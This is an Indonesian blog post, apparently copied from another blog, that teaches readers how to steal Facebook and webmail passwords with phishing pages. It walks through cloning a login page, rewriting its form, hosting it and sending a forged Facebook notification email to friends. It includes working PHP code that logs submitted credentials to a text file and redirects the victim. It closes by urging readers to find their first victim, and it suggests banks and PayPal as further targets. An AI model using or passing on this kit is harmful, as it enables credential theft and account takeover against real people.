Cara yang biasa dilakukan untuk mencuri password adalah dengan memasang fake login, remote komputer, phising, keylogger. Nah yang menurut saya paling mudah dilakukan adalah dengan menggunakan Fake Login. Proses pencurian dengan fake login dilakukan dengan langkah sebagai berikut :
- E-mail palsu
Sebagai pengguna layanan e-mail gratis atau bergabung dengan jejaring sosial, kamu pasti rutin mendapat e-mail kiriman pemberitahuan. Misalnya kamu adalah pengguna facebook. Maka, jika kamu mengizinkan adanya sistem pemberitahuan otomatis melalui e-mail, secara langsung kamu akan diberitahu jika ada teman yang mengkonfirmasi, ada pesan masuk, ada komentar, dll.
Di dalam e-mail tersebut pasti terdapat link tautan yang akan mengarahkan ke halaman yang dimaksud untuk melihat secara langsung isi pemberitahuan tersebut. Lucunya, kita sebagai pengguna kadang lebih suka membuka e-mail terlebih dahulu sebelum membuka halaman facebook. Untuk mudahnya maka langsung saja kita mengklik link tautan tersebut. Toh kita juga akan diarahkan langsung ke halaman utamanya.
Mungkin kita hanya perlu memasukan username dan password, kemudian jreng!... halaman terbuka. Sesederhana itukah? yakinkanh 100% e-mail tersebut dikirim dari facebook, atau hanya e-mail palsu. Kalau memang e-mail palsu, lantas kemanakah kita diredirect? nah itu dia!.... jawabanya adalah Fake Login.
- Halaman Fake Login
Fake login atau halaman palsu untuk jebakan adalah metode yang sudah lama dikenal di dunia hacking, phising dan carding. Korbannya sangat banyak, bahkan yang terbilang senior juga menjadi korban. Intinya adalah ketelitian, kejelian dan kecermatan. Baik dalam membuat maupun menghindari.
Fake login pada prinsipnya adalah halaman palsu yang dibuat seolah-olah serupa dengan halaman aslinya. Namun bedanya fake login akan menjaring username dan password yang kita inputkan di form login menuju file database berbeda.
Halaman utama fake login biasanya dibuat dengan cara mengcopy seluruh halaman utama (web page complete) website tertentu. Selanjutnya memodifikasi link form login asli ke file login.php yang dibuat sendiri menuju database yang juga telah disiapkan.
Proses berikutnya dengan mengupload halaman utama yang telah dicopy dan dimodifikasi tersebut pada file penyimpanan (hosting). Langkah selanjutnya tinggal mengarahkan orang lain untuk mengklik link fake login tersebut dengan berbagai cara, misalnya seperti menggunakan e-mail palsu seperti yang saya sebutkan di atas, atau melalui halaman komentar yang support javascript (seperti di friendster). Atau bahkan menipu mentah-mentah lewat chatting, forum, milist atau yang lain.
Menarik bukan? sangat menarik dan rawan tentunya. Kembali lagi ke diri kita masing-masing. Apapun bentuknya mencuri adalah tindakan tercela. Jauhi sejauh yang kamu mampu dan informasikan yang kamu tahu.
Teknik pencurian password facebook orang lain menggunakan fake login atau lebih dikenal dengan nama phising mari kita bahas semuanya disini. Begitu juga dengan membuat halaman fake login untuk facebook juga kita bahas disini. Nah bagi yang mau bereksperimen sendiri dengan berbagai halaman login palsu misalnya yahoo mail, gmail, paypal, ebay, atau bahkan account sebuah Bank? silakan dicoba disini ha3x....
Hal pertama yang harus dilakukan adalah memiliki webhosting yang support php dan tidak menampilkan iklan popup. Kamu bisa menggunakan yang free, misalnya: byethost, Ripway, Geocities, dll. Langkah selanjutnya download script fake login.
Setelah di ekstrak terdapat tiga file yaitu index.html, logs.php dan logs.txt. Simpan kedalam salah satu direktori dalam web hosting. Misalnya http://namawebhosting.com/facebook. Catat alamat link tersebut.
Selanjutnya adalah membuat email palsu. Patikan nama depan dan nama belakang yang anda gunakan adalah Facebook. Hal ini memastikan penerima email tidak ragu terhadap pengirim email. Misalnya email palsu anda adalah admin_facebook@yahoo.co.id . Setelah itu, download contoh isi email palsu yang berisi pemberitahuan konfirmasi pertemanan, dapat anda Download Disini.
Buka cantoh isi email palsu tersebut, kemudian ganti Nama yang warna merah dengan nama palsu anda. Dan ganti alamat email palsu yang warna merah dengan alamat email palsu anda. Copy isi email palsu tersebut ke kotak pengiriman email anda.
Selanjutnya perhatikan link yang ada dalam isi pesan, seperti ini: http://www.facebook.com/n/?reqs.php&mid=883451G4a3b0e7eG88f1e5G2. Blok alamat link tersebut dan arahkan ke alamat fake login yang telah anda buat sebelumnya.
Selesai,
Kirim email palsu tersebut ke email teman yang memiliki account facebook. Biarkan mereka membukanya dan mengklik link tersebut dan dipastikan username dan password mereka akan terjaring.
Langkah kedua yang dilakukan adalah masuk ke halaman login situs yang menjadi target misalnya yahoo mail. Save Page As (default untuk firefox) atau simpan seluruh halaman secara komplit pada sebuah folder terpisah (misalkan beri nama folder mail). Kamu akan mendapatkan satu buah file html dan sebuah folder yang berisi image dan file lainya. Nah selanjutnya ganti nama file HTML menjadi index.html.
Masih pada folder yang sama, buat sebuah file baru dan beri nama serial.txt. Kemudian buah sebuah file php dengan code script di bawah ini. Kemudian Simpan dengan nama login.php. Pastikan kode warna merah diganti dengan nama domain tempat penyimpanan file fake login tersebut.
<?php Header("Location: http://nama-domain.com"); $handle = fopen("serial.txt", "a"); foreach($_GET as $variable => $value) { fwrite($handle, $variable); fwrite($handle, "="); fwrite($handle, $value); fwrite($handle, "\r\n"); }fwrite($handle, "\r\n"); fclose($handle); exit; ?>
Langkah berikutnya adalah buka file index.html yang tadi menggunakan text editor. Kemudian cari code yang mengarahkan Form login biasanya diindikasikan dengan nama
<form></form>
Kemudian ganti action ke file login.php yang telah dibuat dan ganti method menjadi GET. Kira-kira hasilnya menjadi seperti ini:
<form action ="http://nama-domain.com" method="get"></form>
Jika sudah, upload semua file tersebut kedalam hosting kamu sendiri dan mulailah mencari target phising sebagai korban pertama anda.. ha3x... Selamat Mencoba
source : http://idecapung.blogspot.com/
0 comments:
Post a Comment